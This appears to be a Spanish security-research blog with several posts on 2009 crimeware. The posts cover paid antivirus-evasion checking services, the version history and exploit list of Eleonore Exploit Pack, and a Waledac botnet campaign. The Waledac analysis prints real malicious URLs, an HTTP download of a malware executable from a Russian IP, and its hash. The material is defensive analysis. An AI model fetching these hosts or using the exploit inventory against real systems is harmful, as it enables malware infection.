El crimeware durante el 2009

"El crimeware durante el 2009" plasma en un solo documento todo lo que se canalizó a través de este blog durante el año en cuestión en materia de crimeware y amenazas asociadas.

Cuenta con un total de 262 páginas y se encuentra dividido por las temáticas más relevantes que describen las actividades delictivas que fueron motivo de noticias en este blog. Posee dos índices que permiten encontrar las noticias de forma sencilla (índice de contenido), y otro sobre las imágenes (índice de imágenes).

A continuación dejo alguna de las temáticas que encontraran en el documento en cuestión:

• Panorama actual de negocio ocasionado por crimeware
• Framework Exploit Pack para botnets de propósito general
• Framework Exploit Pack para botnets de propósito particular
• Servicios asociados al crimeware
• Inteligencia en la lucha contra el crimeware
  
• Campañas de propagación e infección
• Otros Exploits Pack que se investigaron
  

Información
Malware Intelligence
Compendio anual de información. El crimeware durante el 2009
262 páginas
Idioma español

Descarga

Jorge Mieres

Ver más

Crimeware-as-a-Service y mecanismos de evasión antivirus

Los modelos de negocio que ofrece el Cloud Computing no son novedosos. Incluso, muchos servicios que en la actualidad se ofrecen bajo esta bandera poseen un modelo ya implantado hace mucho tiempo en el mercado.

Sin embargo, el concepto Cloud Computing en sí mismo que conocemos en la actualidad responde a una orientación netamente inclinada a generar negocios aprovechando Internet como infraestructura, lo cual en un mercado altamente competitivo goza de ciertas ventajas con respecto al negocio convencional.

Bajo este escenario, lo cierto es que esta manera de crear negocios también fue aceptada y puesto en marcha por quienes cotidianamente lucran a través de una batería de programas diseñados con fines fraudulentos que cuando son utilizados a través de Internet, reciben el término de Crimeware-as-a-Service, o también por su acrónimo CaaS.

De esta manera comienzan a gestarse servicios fraudulentos que buscan automatizar la manipulación de malware en un proceso creado exclusivamente para evadir su detección. Un ejemplo de esto lo es el servicio (que hoy ya no existe), llamado PoisonIvy Polymorphic Online Builder, creado para cifrar malware y del cual hablamos en su momento. En este caso, al manipular solamente códigos maliciosos, este tipo de servicio se aglomera bajo el término de Malware-as-a-Service (MaaS).

Del mismo modo, en la actualidad existen servicios desarrollados con fines de lucro y destinados a alimentar el negocio del crimeware a través de mecanismos que permiten verificar el grado de efectividad del malware frente a los motores de detección antivirus.

Estos servicios constituyen el antónimo de otros altamente empleados por los profesionales de seguridad como por ejemplo VirusTotal de la compañía español Hispasec. Sobre uno de ellos también ya hemos hablado, llamado VirTest.

Sin embargo, existen algunos otros como Private antivirus service (creado en el 2008), que al igual que VirTest es de origen ruso y busca obtener un beneficio económico a través de un servicio pago, pero al mismo tiempo colaborar con el ambiente del ciber-crimen ofreciendo la posibilidad de chequear el malware creado para conocer su índice de detección en determinado momento, asegurándose además, que el binario no será compartido con las compañías antivirus. De esta manera, se asegura el anonimato y un ciclo de vida más prolongado para la amenaza.

El servicio fraudulento permite verificar la efectividad del malware frente a 17 motores de los antivirus más conocidos del mercado antimalware, y como se visualiza en la primera captura, existen tres costos en función de la característica de los "contratado":

• USD 0.2 por chequeo
• USD 15 por 10 chequeos limitados diariamente
• USD 20 por chequeos sin límites
  

Una vez dentro del sistema, desde la solapa AV check, se suben los binarios que serán sometidos al escaneo de los antivirus, ofreciendo luego el reporte y un historial de los archivos subidos. Estas opciones se encuentran en el ángulo inferior izquierdo.

Un aspecto interesante que ofrece este servicio de crimeware, lo constituye la posibilidad de programar tareas de verificación, a través de la segunda solapa llamada Programador.

Esta opción permite, por un lado, subir un archivo malicioso desde el disco duro del creador del malware; y por el otro, seleccionar un malware que ya se encuentre en el circuito de propagación a través de la URL; es decir, que el ciber-delincuente puede verificar y controlar la detección de o los códigos maliciosos que ya este propagando.

De esta forma y a través del "programador", se planifica la frecuencia de chequeo de los códigos maliciosos subidos en función de una serie de parámetros que se eligen según un tiempo establecido que van en el rango de 3, 6, 12 horas, ó 1 y 3 días.

Estos parámetros son configurables y una vez establecido pueden ser visualizados en una tabla que se muestra en la misma ventana. La tercera columna corresponde al rango de tiempo. También se configura la manera en que desplegará una alerta con el reporte, que puede ser a través de un correo electrónico o a través de ICQ.

Claramente estas opciones están ideadas pensando en agilizar las maniobras delictivas de propagación de malware chequeando, en el menor de los tiempos, cada 3 horas para verificar si la amenaza es detectada por las compañías antivirus. Esto permite cambiar el malware cada vez que sea necesario, y hasta combinar el servicio con otros como por ejemplo el "servicio" mencionado líneas arriba para cifrar los archivos.

Evidentemente quienes forman parte de la cadena delictiva del negocio del crimeware, colaboran entre sí por intermedio de diferentes alternativas, conformando también un negocio paralelo que también se nutre de las actividades delictivas.

Información relacionada
Servicio ruso en línea para comprobar la detección de malware
Software as a Service en la industria del malware
Creación Online de malware polimórfico basado en PoisonIvy

Jorge Mieres

Ver más

Estado del arte en Eleonore Exploit Pack

Desde el lanzamiento de la primera versión, en junio del 2009, Eleonore Exploit Pack goza de un importante impacto en el ámbito criminal, tanto desde la demanda de obtener el Exploit Pack debido a su costo competitivo respecto a las aplicaciones web similares, como por su alto índice de actividad.

Actualmente cuenta con un repertorio de 6 (seis) versiones, siendo la última la 1.3.2, de reciente aparición en la escena underground a un costo de USD 1000.

Esto significa que su autor, ExManoize, fue actualizando el paquete aproximadamente cada mes, lo que da una idea concreta del esfuerzo depositado en su desarrollo, y que obviamente no es por vocación sino que responde y forma parte del negocio fraudulento, colaborando con la creación y mantenimiento de una de las "herramientas" utilizadas en el campo delictivo.

La estructura de este crimeware es bastante compleja y cuenta con un repertorio total de 13 (trece) exploits por defecto que se incluyen en el paquete y que son los siguientes:

• MDAC. Funciona en MSIE
• MS009-02. Funciona en MSIE
• ActiveX pack. Funciona en MSIE
• compareTo. Funciona en Firefox
• JNO (JS navigator Object Code). Funciona en Firefox
• MS06-006. Funciona en Firefox
• Font tags. Funciona en Firefox
• Telnet. Funciona en Opera
• PDF collab.getIcon. Funciona en todos los navegadores
• PDF Util.Printf. Funciona en todos los navegadores
• PDF collab.collectEmailInfo. Funciona en todos los navegadores
• PDF Doc.media.newPlayer. Funciona en todos los navegadores
• Java calendar. Funciona en todos los navegadores

Obviamente, como todo servicio que se ofrece dentro de un modelo de mercado, y el crimeware lo es incluyendo este, el "prestador" garantiza el soporte, las actualizaciones y limpieza del paquete en caso de ser necesario. ¡Todo un negocio!

Desde el punto de vista histórico, las actualizaciones de Eleonore Exploit Pack son las siguientes:

• En junio de 2009 se pone a disposición del público la venta de Eleonore Exploit Pack v1.0, conteniendo los exploits para MDAC, MS009-02, Snapshot, Telnet (para opera), PDF collab.getIcon, PDF Util.Printf, PDF collab.collectEmailInfo. Su valor fue, en principo, de USD 599.
• En julio de 2009 se actualiza a la versión 1.1 y se agregan dos exploits más: Font tags que explota en Firefox 3.5 y DirectX DirectShow que explota en IE 6 y 7. Además, se realizan mejoras en el cifrado de los scripts. Su valor fue de USD 500, y la versión anterior bajo el precio a USD 300.
• Durante el mismo mes de julio, se agrega el exploit Spreadsheet, se modifican los archivos PDF, se elimina la captura de imágenes y se agrega la capacidad de cargar un archivo a través del propio panel de administración. La versión es denominada 1.2 y su costo se establece en USD 700.
• Luego de un periodo de tres meses sin actualizaciones, en octubre aparece la versión 1.3, incorporando en el paquete más funcionalidades fraudulentas. Entre ellas, algunas "mejoras" en los exploits para Internet Explorer y se agrega Java D&E. EL costo de esta versión fue de USD 1000.
• En noviembre comienza la comercialización de la versión 1.3.1, donde se continúan puliendo los exploits y, entre otros, se agrega el archivo Robots.txt para mejorar el indexado y evitar que ciertas carpetas se muestren. El precio se mantuvo en USD 1000.
• Durante este periodo de tiempo, se podía encontrar In-the-Wild una versión beta privada (1.3B).
• El 16 de diciembre, aparece la última versión, 1.3.2 que agrega Java calendar y un Exploit para la reciente vulnerabilidad PDF Doc.media.newPlayer, que hasta ese entonces se trataba de un 0-Day. Su valor no se modificó.

Desde el punto de vista del empleador, la infraestructura para manejar el negocio de las botnets consiste en armarla y ponerla en funcionamiento a través de un servidor dedicado que también puede ser contratado. Sin embargo, para obtener el beneficio económico se necesita de las zombis, ya que sin ellas no se podrían optimizar las tareas fraudulentas para las cueles están pensadas. De hecho, que el paquete se actualice con bastante regularidad, demuestra que los réditos que se obtienen a través de estas actividades son importantes.

Por otro lado, independientemente del costo que posee el crimeware, existen "servicios extras" ofrecidos por el desarrollador, que no están incluidos en el paquete original, como por ejemplo, la limpieza de la botnet por un costo USD 50, al igual que el cambio de dominio malicioso por el mismo valor, USD 50.

Alternativamente, los botmaster (que no necesariamente son los desarrolladores de la aplicación web) suelen alquilar su botnet de forma parcial, y en el caso de Eleonore Exploit Pack v1.3.2, su alquiler es de USD 40 por día.

Información relacionada
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
RussKill. Aplicación para realizar ataques de DoS
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
T-IFRAMER. Kit para la inyección de malware In-the-Wild
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades
ZeuS Botnet y su poder de reclutamiento zombi
DDBot. Más gestión de botnets vía web
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
Hybrid Botnet Control System. Desarrollo de http bot en perl
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
TRiAD Botnet III. Administración remota de zombis multiplataforma
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild

Jorge Mieres

Ver más

Waledac. Línea de tiempo '07-'09

El troyano waledac, encargado de reclutar zombis para alimentar una botnet dedicada al spam, recientemente volvió a dar noticia al utilizar como excusa la llegada del nuevo año 2010.

Sin embargo, sus actividades fraudulentas datan desde el año 2007 cuando se lo conoció bajo la nomenclatura de storm, y desde entonces, esta familia de malware se ha aprovechado de Ingeniería Social como principal estrategia de propagación bajo diversas coberturas.

La presente línea de tiempo abarca desde las primeras actividades de Ingeniería Social hasta la última y recientemente conocida, relacionda al inicio del 2010.

Información relacionada
Waledac vuelve con otra estrategia de ataque
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Ver más

Waledac vuelve con otra estrategia de ataque

Luego de un largo periodo de inactividad, la botnet formada por waledac vuelve a desplegar una estrategia de infección utilizando el patrón que lo caracteriza: Ingeniería Social, que en esta oportunidad aprovecha como cobertura el comienzo del nuevo año.

Las últimas campañas de waledac datan de mediados de año cuando la estrategia de propagación utilizada simulaba ser un video sobre el día de la independencia en EE.UU, alojado en YouTube. De hecho, la actividad más importante durante este año se produjo durante el primer cuatrimestre.

A continuación podemos observar capturas que describen la línea de tiempo de waledac en torno a su actividad durante el 2009.

Sin embargo, quienes se encuentran detrás de waledac nunca se detuvieron y los dominios utilizados recientemente poseen fecha de registro durante todo el periodo de supuesta inactividad.

Cada página utilizada para la propagación posee un script ofuscado con instrucciones para ser ejecutadas de forma automática en el equipo víctima. De esta manera, se explota una debilidad y automáticamente se descarga y ejecuta el malware, convirtiendo el equipo en un nodo más de la botnet, para continuar con sus actividades fraudulentas. A continuación vemos una captura del script.

Dentro del script se encuentra la referencia hacia el archivo counter.php que aloja otro script y desde el cual salta hacia http://diokxbgrqkgg.com/ld/trest1/ y este a http://diokxbgrqkgg.com/nte/trest1.py, en donde se encuentra otro script malicioso.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html

En esta instancia, descarga y ejecuta un archivo llamado "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) desde la dirección IP 95.169.190.208 alojada en Rusia.

Cabe aclarar que este malware posee un muy bajo índice de detección, siendo detectado hasta el momento sólo por 6 compañías antivirus de un total de 40. Reporte de VT.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac ha vuelto con una nueva excusa, aunque a juzgar por el porcentaje de actividad que posee el servidor donde se encuentra alojado, todo indica que siempre se mantuvo latente con actividades muy esporádicas. Incluso, teniendo en cuenta la estructura de carpetas desde la cual se descarga, parecería haber una relación directa con otra amenaza bastante conocido que es Bredolab, y a la cual aparentemente también asocian con algunos scareware y ZeuS.

Información relacionada
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Ver más